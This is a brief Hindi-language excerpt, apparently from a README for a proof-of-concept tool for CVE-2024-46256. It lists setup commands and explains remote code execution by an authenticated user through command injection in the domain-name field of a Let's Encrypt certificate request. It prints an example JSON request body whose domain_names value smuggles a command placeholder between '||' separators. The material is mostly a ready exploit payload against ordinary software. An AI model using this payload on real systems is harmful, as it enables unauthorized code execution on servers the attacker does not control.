
CVE-2024-46256 उपकरण
docker-compose up -d
या आप स्वचालित स्क्रिप्ट का उपयोग कर सकते हैं:
python setup_environment.py
PoC प्रमाणित उपयोगकर्ता द्वारा प्रमाणपत्र जारी करने (जैसे Let's Encrypt) अनुरोध प्रक्रिया में डोमेन नाम फ़ील्ड में टेम्पलेट/कमांड इंजेक्शन करके RCE का कारण बनता है।
उदाहरण पेलोड (अवधारणा उदाहरण):
{
"domain_names": ["test.com\"||{command}||\\n test.com\""],
"meta": {
"dns_challenge": false,
"letsencrypt_agree": true,
"letsencrypt_email": "[email protected]"
},
"provider": "letsencrypt"
}